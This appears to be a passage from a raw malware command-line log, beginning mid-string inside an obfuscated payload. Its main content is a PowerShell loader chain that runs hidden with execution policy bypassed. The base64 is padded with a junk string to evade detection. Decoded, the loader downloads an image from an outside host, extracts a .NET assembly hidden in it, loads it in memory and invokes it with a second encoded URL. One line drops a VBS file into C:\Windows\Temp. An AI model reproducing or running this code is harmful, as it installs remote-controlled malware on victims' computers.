kUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline powershell.exe -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force }
cmdline powershell -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
